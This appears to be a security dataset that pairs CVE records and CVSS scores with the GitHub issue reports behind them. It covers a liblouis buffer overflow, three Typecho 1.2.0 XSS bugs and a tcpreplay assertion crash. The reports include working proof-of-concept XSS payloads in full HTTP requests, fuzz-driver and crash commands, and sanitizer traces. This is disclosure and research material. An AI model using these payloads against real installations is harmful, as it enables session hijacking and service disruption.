https://api.github.com/repos/liblouis/liblouis/issues/1292/comments
1
2023-02-04T14:23:04Z
2023-02-08T11:00:21Z
https://github.com/liblouis/liblouis/issues/1292
1,570,964,626
1,292
4,849
CVE-2023-26768
2023-03-16T15:15:10.290
Buffer Overflow vulnerability found in Liblouis v.3.24.0 allows a remote attacker to cause a denial of service via the compileTranslationTable.c and lou_setDataPath functions.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/liblouis/liblouis/issues/1301" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/liblouis/liblouis/pull/1302" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/liblouis/liblouis/issues/1301" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/liblouis/liblouis/pull/1302" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:liblouis:liblouis:3.24.0:*:*:*:*:*:*:*", "matchCriteriaId": "6125AA43-2A33-4526-B355-32D42F306CD3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/liblouis/liblouis/issues/1301
[ "Exploit", "Issue Tracking" ]
github.com
[ "liblouis", "liblouis" ]
## Summary When long filename (larger than 256) is given to API `lou_logFile()`, there will be a global-buffer-overflow. https://github.com/liblouis/liblouis/blob/517f6f1f35fc5c57ac2f045caa168191bdeaadde/liblouis/logging.c#L121-L130 ## Test Environment Ubuntu 16.04.3 LTS liblouis (master, 6223f21) ## How to trigger 1. Compile liblouis with AddressSanitizer 2. Compile the [fuzz driver](https://raw.githubusercontent.com/Marsman1996/pocs/master/liblouis/driver-API-6223f21-lou_logFile-BO.c) and [poc file](https://raw.githubusercontent.com/Marsman1996/pocs/master/liblouis/poc-API-6223f21-lou_logFile-BO) 3. Compile the fuzz driver: `$ clang -g -fsanitize=address,fuzzer ./driver-API-6223f21-lou_logFile-BO.c ./bin_asan/lib/liblouis.a -I ./bin_asan/include/liblouis/ -o driver-API-6223f21-lou_logFile-BO` 4. run the compiled driver: `$ ./driver-API-6223f21-lou_logFile-BO poc-API-6223f21-lou_logFile-BO` ## ASAN report ``` $ ./driver-API-6223f21-lou_logFile-BO poc-API-6223f21-lou_logFile-BO Minimum size is 0 INFO: Running with entropic power schedule (0xFF, 100). INFO: Seed: 2700932249 INFO: Loaded 1 modules (57 inline 8-bit counters): 57 [0x7b0360, 0x7b0399), INFO: Loaded 1 PC tables (57 PCs): 57 [0x5705c0,0x570950), ./driver-API-6223f21-lou_logFile-BO: Running 1 inputs 1 time(s) each. Running: poc-API-6223f21-lou_logFile-BO ================================================================= ==20412==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000108b6e0 at pc 0x00000050dbf8 bp 0x7ffe6a0ffac0 sp 0x7ffe6a0ff280 WRITE of size 4098 at 0x00000108b6e0 thread T0 #0 0x50dbf7 in strcpy /local/mnt/workspace/bcain_clang_vm-bcain-aus_3184/final/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:423:5 #1 0x55492e in lou_logFile /opt/disk/marsman/liblouis/6223f21/build_asan/liblouis/../../code/liblouis/logging.c:130:34 #2 0x553634 in AFG_func /opt/disk/marsman/liblouis/6223f21/./driver-API-6223f21-lou_logFile-BO.c:17:2 #3 0x553850 in LLVMFuzzerTestOneInput /opt/disk/marsman/liblouis/6223f21/./driver-API-6223f21-lou_logFile-BO.c:44:2 #4 0x459911 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /local/mnt/workspace/bcain_clang_vm-bcain-aus_3184/final/llvm-project/compiler-rt/lib/fuzzer/FuzzerLoop.cpp:599:15 #5 0x4435d2 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /local/mnt/workspace/bcain_clang_vm-bcain-aus_3184/final/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:323:6 #6 0x449940 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /local/mnt/workspace/bcain_clang_vm-bcain-aus_3184/final/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:856:9 #7 0x4738c2 in main /local/mnt/workspace/bcain_clang_vm-bcain-aus_3184/final/llvm-project/compiler-rt/lib/fuzzer/FuzzerMain.cpp:20:10 #8 0x7f8ea559983f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 #9 0x41e0d8 in _start (/opt/disk/marsman/liblouis/6223f21/driver-API-6223f21-lou_logFile-BO+0x41e0d8) 0x00000108b6e0 is located 0 bytes to the right of global variable 'initialLogFileName' defined in '../../code/liblouis/logging.c:121:13' (0x108b5e0) of size 256 SUMMARY: AddressSanitizer: global-buffer-overflow /local/mnt/workspace/bcain_clang_vm-bcain-aus_3184/final/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:423:5 in strcpy Shadow bytes around the buggy address: 0x000080209680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 0x000080209690: f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 0x0000802096a0: f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 0x0000802096b0: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 0x0000802096c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0000802096d0: 00 00 00 00 00 00 00 00 00 00 00 00[f9]f9 f9 f9 0x0000802096e0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x0000802096f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080209700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080209710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080209720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==20412==ABORTING ```
global-buffer-overflow in lou_logFile() when long filename is given
https://api.github.com/repos/liblouis/liblouis/issues/1301/comments
4
2023-02-09T03:17:32Z
2023-02-09T16:52:34Z
https://github.com/liblouis/liblouis/issues/1301
1,577,161,376
1,301
4,850
CVE-2023-27130
2023-03-16T15:15:10.453
Cross Site Scripting vulnerability found in Typecho v.1.2.0 allows a remote attacker to execute arbitrary code via an arbitrarily supplied URL parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/typecho/typecho/commit/f9ede542c9052ba22a6096d8412e2f02d9de872b" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/typecho/typecho/issues/1535" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/typecho/typecho/commit/f9ede542c9052ba22a6096d8412e2f02d9de872b" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/typecho/typecho/issues/1535" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:typecho:typecho:*:*:*:*:*:*:*:*", "matchCriteriaId": "6E76E682-FBFE-4F43-85E0-B59B7ACE52BD", "versionEndExcluding": null, "versionEndIncluding": "1.2.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/typecho/typecho/issues/1535
[ "Exploit", "Issue Tracking" ]
github.com
[ "typecho", "typecho" ]
## Typecho <= 1.2.0 Admin System with Reflected-XSS ### Influenced Version Typecho <= 1.2.0 <img width="404" alt="1" src="https://user-images.githubusercontent.com/22876693/220301381-1575d787-374b-4954-ab8b-87c88462a24d.png"> ### Description Typecho admin backend management system with reflected-XSS in the name of an arbitrarily supplied URL parameter. 1. Login to typecho admin backend management system, in "/admin/index.php", "admin/themes.php" or "/admin/backup.php". 2. In the name of an arbitrarily supplied URL parameter, no matter key or value, will be injected to a html `href` attribute of `<a>` tag. ### POC ```text GET /typecho/admin/?"><script>alert(1)</script><!--bbb=1 HTTP/1.1 Host: 192.168.0.10 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.0.10/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Ftypecho%2Fadmin%2Findex.php%3Fr7ptu%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Eat2f7%3D1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: e4dff44224c23efabc177d44e50b1de4__typecho_uid=1; e4dff44224c23efabc177d44e50b1de4__typecho_authCode=%24T%248O0qulQf98a49e06253d4ae8c93f478424457be4b; PHPSESSID=m7h7isuus6cugk6mb58vdah296 Connection: close ``` /admin/index.php <img width="1204" alt="2" src="https://user-images.githubusercontent.com/22876693/220301921-d3ba370c-81df-4f72-b6d4-c61d9b7dfdfe.png"> <img width="1421" alt="3" src="https://user-images.githubusercontent.com/22876693/220301959-e018c274-57c5-4b8b-b34d-101c3ab709a8.png"> /admin/theme.php <img width="1154" alt="5" src="https://user-images.githubusercontent.com/22876693/220302151-a2145d89-ed3a-4b22-b0bb-0975299f96aa.png"> <img width="1026" alt="6" src="https://user-images.githubusercontent.com/22876693/220302182-d7ca935e-f954-4b06-b2c6-10d19d9aa40a.png"> ![4](https://user-images.githubusercontent.com/22876693/220302000-bb1fd269-0980-4d4e-abec-da2ef5e4dbb4.png) /admin/backup.php <img width="1347" alt="8" src="https://user-images.githubusercontent.com/22876693/220302516-ae8e55e3-3962-4203-99f5-f8dd109895e8.png"> <img width="968" alt="9" src="https://user-images.githubusercontent.com/22876693/220302541-b02c668b-9a05-4bed-aa6f-5c5255bead5c.png"> ![7](https://user-images.githubusercontent.com/22876693/220302557-4dd4a859-2f5a-4b4a-8155-30333b2244a9.png) > Reported by Srpopty, vulnerability discovered by using Corax.
Typecho <= 1.2.0 Admin System with Reflected-XSS Vulnerability
https://api.github.com/repos/typecho/typecho/issues/1535/comments
0
2023-02-21T09:23:49Z
2023-02-21T09:43:28Z
https://github.com/typecho/typecho/issues/1535
1,593,123,821
1,535
4,851
CVE-2023-27131
2023-03-16T15:15:10.500
Cross Site Scripting vulnerability found in Typecho v.1.2.0 allows a remote attacker to execute arbitrary code viathe Post Editorparameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/typecho/typecho/issues/1536" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/typecho/typecho/issues/1536" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:typecho:typecho:*:*:*:*:*:*:*:*", "matchCriteriaId": "6E76E682-FBFE-4F43-85E0-B59B7ACE52BD", "versionEndExcluding": null, "versionEndIncluding": "1.2.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/typecho/typecho/issues/1536
[ "Exploit" ]
github.com
[ "typecho", "typecho" ]
## Typecho <= 1.2.0 Post Editor with DOM-based-XSS Vulnerability ### Influenced Version Typecho <= 1.2.0 <img width="404" alt="1 2" src="https://user-images.githubusercontent.com/22876693/220303820-ae511def-3bbe-4ef6-984e-90bdf9b81da3.png"> ### Description Typecho admin backend post editor with DOM-based XSS when adding a new post tag. 1. Login to admin backend management system. 2. Create a new or edit an existed post, in โ€œadmin/write-post.phpโ€ add a new tag. 3. If the new tag name contains the XSS payload, e.g. `<li><p>aaa<a>test</a></p></li>`, it will be injected into a `<li>` html tag. ### POC ```text <li><p>aaa<img src=x onerror=alert(1)>aaa</p></li> ``` <img width="1669" alt="1" src="https://user-images.githubusercontent.com/22876693/220304152-cccb8e03-dfa1-455f-88c6-41d6bcdf74bc.png"> <img width="1749" alt="2" src="https://user-images.githubusercontent.com/22876693/220304189-a9f54add-849d-40fc-b0b1-386ca7e703d0.png"> > Reported by Srpopty, vulnerability discovered by using Corax.
Typecho <= 1.2.0 Post Editor with DOM-based-XSS Vulnerability
https://api.github.com/repos/typecho/typecho/issues/1536/comments
0
2023-02-21T09:29:10Z
2024-01-23T10:30:00Z
https://github.com/typecho/typecho/issues/1536
1,593,131,427
1,536
4,852
CVE-2023-27711
2023-03-16T15:15:10.663
Cross Site Scripting vulnerability found in Typecho v.1.2.0 allows a remote attacker to execute arbitrary code via the Comment Manager /admin/manage-comments.php component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/typecho/typecho/issues/1539" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://srpopty.github.io/2023/03/02/Typecho-V1.2.0-Backend-Reflected-XSS-cid/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/typecho/typecho/issues/1539" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://srpopty.github.io/2023/03/02/Typecho-V1.2.0-Backend-Reflected-XSS-cid/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:typecho:typecho:*:*:*:*:*:*:*:*", "matchCriteriaId": "6E76E682-FBFE-4F43-85E0-B59B7ACE52BD", "versionEndExcluding": null, "versionEndIncluding": "1.2.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/typecho/typecho/issues/1539
[ "Exploit" ]
github.com
[ "typecho", "typecho" ]
## Typecho <= 1.2.0 Comment Manager with Refleted-XSS Vulnerability ### Influenced Version Typecho <= 1.2.0 <img width="404" alt="1 2" src="https://user-images.githubusercontent.com/22876693/220303820-ae511def-3bbe-4ef6-984e-90bdf9b81da3.png"> ### Description Typecho admin backend comment manager with refleted-XSS vulnerability.. 1. Login to admin backend management system. 2. In Comment Manager `/admin/manage-comments.php`, the unfiltered request parameter `cid` is directly echoed to html. <img width="1208" alt="6" src="https://user-images.githubusercontent.com/22876693/222358417-5652d6d0-5c62-4b76-bc6f-0bb6feb6f30f.png"> ### POC POST `/admin/manage-comments.php` with: ```text coid[]=1&cid="><script>alert(1)</script><!-- ``` The full POC request: ```http POST /cms/typecho/admin/manage-comments.php?status=wating&category=&keywords=abc&__typecho_all_posts=off&uid= HTTP/1.1 Host: 192.168.0.10 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.0.10/cms/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Fcms%2Ftypecho%2Fadmin%2Fmanage-comments.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: 745020ecd4b17dde48d43755702a78b4__typecho_uid=1; 745020ecd4b17dde48d43755702a78b4__typecho_authCode=%24T%249aGUcl7K02f405471bbdacf65892bf8ffb75bc211; PHPSESSID=m7h7isuus6cugk6mb58vdah296; u5DD_2132_saltkey=ql9191Ym; u5DD_2132_lastvisit=1677486351; u5DD_2132_seccodecSASGLE52ETX=1.1b4fba6d0be0f7dce2; u5DD_2132_ulastactivity=dd6b5bfUH2dwkFNJ5HnOvs2bnRKl16bY2TMsiYWsOsPOeru7pyMl; u5DD_2132_auth=ade9wjKb33QiAdI8RrnDloFyK4vB8ca3sx7pIgT0BNlWPo1CeA%2Bsk87ST8rZ%2FVqZTdeIhOInVMfZCF8zm7uu; u5DD_2132_lastcheckfeed=1%7C1677489964; u5DD_2132_nofavfid=1; u5DD_2132_home_diymode=1; u5DD_2132_visitedfid=2; u5DD_2132_smile=1D1; u5DD_2132_home_readfeed=1677497943; u5DD_2132_forum_lastvisit=D_2_1677498054; u5DD_2132_st_t=1%7C1677498055%7C9149ebde1ec47006277ae3faf93f0e2f; u5DD_2132_editormode_e=1; u5DD_2132_st_p=1%7C1677498095%7C926ebc78300a154f5ad9ebb023eb0b77; u5DD_2132_viewid=tid_1; u5DD_2132_seccode=5.792e3c6d8b004d4403; u5DD_2132_seccodecSE52ETX=6.a73b7daa353701b59a Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 44 coid[]=1&cid="><script>alert(1)</script><!-- ``` <img width="1850" alt="2" src="https://user-images.githubusercontent.com/22876693/222358549-bfaad3b4-2f18-47a8-bfd6-f3cbabe1a8dd.png"> <img width="1425" alt="3" src="https://user-images.githubusercontent.com/22876693/222358566-b2c5df6e-1fd7-4961-a4e8-bd1501c356bb.png"> <img width="1618" alt="4" src="https://user-images.githubusercontent.com/22876693/222358587-00b66812-9133-4c24-88f0-cb5c6c9fb60b.png"> <img width="1653" alt="5" src="https://user-images.githubusercontent.com/22876693/222358602-f695b27e-3266-4f79-95f2-525ed693942e.png"> > Reported by Srpopty, vulnerability discovered by using Corax.
Typecho <= 1.2.0 Comment Manager with Refleted-XSS Vulnerability
https://api.github.com/repos/typecho/typecho/issues/1539/comments
0
2023-03-02T07:23:07Z
2023-03-03T08:37:40Z
https://github.com/typecho/typecho/issues/1539
1,606,242,143
1,539
4,853
CVE-2023-27783
2023-03-16T15:15:10.717
An issue found in TCPreplay tcprewrite v.4.4.3 allows a remote attacker to cause a denial of service via the tcpedit_dlt_cleanup function at plugins/dlt_plugins.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/issues/780" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/pull/781" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/issues/780" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/pull/781" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/appneta/tcpreplay/issues/780
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "appneta", "tcpreplay" ]
**Describe the bug** There is a reachable assertion in `tcpedit_dlt_cleanup()` when when the user uses `tcprewrite` to open a crafted pcap file in `DLT_JUNIPER_ETHER` mode. **To Reproduce** Steps to reproduce the behavior: 1. Get the Tcpreplay source code and compile it. ``` $ ./configure $ make ``` 2. Run Command `$ ./tcprewrite --dlt="jnpr_eth" -i $POC -o /dev/null` The POC file could be downloaded here: [POC file](https://raw.githubusercontent.com/Marsman1996/pocs/master/tcpreplay/poc-tcprewrite-bcb107a-tcpedit_dlt_cleanup-assertion) **Expected behavior** Program reports assertion failure and is terminated. The GDB report: ``` $ gdb --args ./bin_normal/bin/tcprewrite --dlt="jnpr_eth" -i ./poc-tcprewrite-bcb107a-tcpedit_dlt_cleanup-assertion -o /dev/null (gdb) r Starting program: /home/ubuntu178/cvelibf/test/tcpreplay/latest/bin_normal/bin/tcprewrite --dlt=jnpr_eth -i ./poc-tcprewrite-bcb107a-tcpedit_dlt_cleanup-assertion -o /dev/null Warning: ./poc-tcprewrite-bcb107a-tcpedit_dlt_cleanup-assertion was captured using a snaplen of 96 bytes. This may mean you have truncated packets. tcprewrite: plugins/dlt_plugins.c:462: tcpedit_dlt_cleanup: Assertion `ctx' failed. Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff7d6d859 in __GI_abort () at abort.c:79 #2 0x00007ffff7d6d729 in __assert_fail_base (fmt=0x7ffff7f03588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x555555572ae6 "ctx", file=0x555555572ad0 "plugins/dlt_plugins.c", line=462, function=<optimized out>) at assert.c:92 #3 0x00007ffff7d7ef36 in __GI___assert_fail (assertion=0x555555572ae6 "ctx", file=0x555555572ad0 "plugins/dlt_plugins.c", line=462, function=0x555555572fb0 <__PRETTY_FUNCTION__.7740> "tcpedit_dlt_cleanup") at assert.c:101 #4 0x000055555556156d in tcpedit_dlt_cleanup (ctx=0x0) at plugins/dlt_plugins.c:462 #5 0x0000555555569aca in dlt_jnpr_ether_cleanup (ctx=0x555555580090) at plugins/dlt_jnpr_ether/jnpr_ether.c:171 #6 0x000055555556158c in tcpedit_dlt_cleanup (ctx=0x555555580090) at plugins/dlt_plugins.c:466 #7 0x000055555555a763 in tcpedit_close (tcpedit_ex=0x55555557db60 <tcpedit>) at tcpedit.c:599 #8 0x0000555555558f02 in main (argc=0, argv=0x7fffffffde38) at tcprewrite.c:154 ``` **System (please complete the following information):** - OS: Ubuntu - OS version: 20.04, 64 bit - Tcpreplay Version: master bcb107a ``` $ ./bin_normal/bin/tcprewrite -V tcprewrite version: 4.4.3 (build git:v4.4.3) Copyright 2013-2022 by Fred Klassen <tcpreplay at appneta dot com> - AppNeta Copyright 2000-2012 by Aaron Turner <aturner at synfin dot net> The entire Tcpreplay Suite is licensed under the GPLv3 Cache file supported: 04 Not compiled with libdnet. Compiled against libpcap: 1.9.1 64 bit packet counters: enabled Verbose printing via tcpdump: enabled Fragroute engine: disabled ```
[Bug] Reachable assertion in tcpedit_dlt_cleanup() at plugins/dlt_plugins.c
https://api.github.com/repos/appneta/tcpreplay/issues/780/comments
5
2023-03-01T03:10:46Z
2023-06-12T11:10:36Z
https://github.com/appneta/tcpreplay/issues/780
1,604,155,785
780
4,854
CVE-2023-27784
2023-03-16T15:15:10.767
